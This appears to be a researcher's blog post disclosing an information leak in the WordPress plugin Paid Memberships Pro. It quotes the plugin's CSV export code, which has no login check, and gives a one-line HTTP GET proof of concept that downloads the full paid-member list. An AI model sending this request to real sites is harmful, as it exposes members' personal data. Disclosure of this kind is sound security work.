Paid Memberships Pro | ceriksen.com

Advisory
Secunia Advisory SA 49630

Analysis of vulnerability
The page /adminpages/memberslist-csv.php is called through AJAX from admin pages, in order to export a CSV list of paid members on the WordPress site. It sets itself up like this:

//this file is launched via AJAX to get various data from the DB for the stranger_products plugin

//wp includes
define('WP_USE_THEMES', false);
require('../../../../wp-load.php');

//get users	
if(isset($_REQUEST['s']))
	$s = $_REQUEST['s'];
else
	$s = "";

if(isset($_REQUEST['l']))
	$l = $_REQUEST['l'];
else
	$l = false;

//some vars for the search
if(!empty($_REQUEST['pn']))
	$pn = $_REQUEST['pn'];
else
	$pn = 1;

if(!empty($_REQUEST['limit']))
	$limit = $_REQUEST['limit'];
else
	$limit = false;

if($limit)
{	
	$end = $pn * $limit;
	$start = $end - $limit;		
}

//this file is launched via AJAX to get various data from the DB for the stranger_products plugin

//wp includes

define('WP_USE_THEMES', false);

require('../../../../wp-load.php');

//get users

if(isset($_REQUEST['s']))

$s = $_REQUEST['s'];

else

$s = "";

if(isset($_REQUEST['l']))

$l = $_REQUEST['l'];

else

$l = false;

//some vars for the search

if(!empty($_REQUEST['pn']))

$pn = $_REQUEST['pn'];

else

$pn = 1;

if(!empty($_REQUEST['limit']))

$limit = $_REQUEST['limit'];

else

$limit = false;

if($limit)

{

$end = $pn * $limit;

$start = $end - $limit;

}

Due to a lack of validation that the user is logged in and has sufficient rights to do so, we can simply request this page and get a full list of paid members on the blog.

GET /wordpress/wp-content/plugins/paid-memberships-pro/adminpages/memberslist-csv.php HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/paid-memberships-pro/adminpages/memberslist-csv.php HTTP/1.1 Host: 192.168.80.130

ceriksen.com

Archives

WordPress Paid Memberships Pro information disclosure vulnerability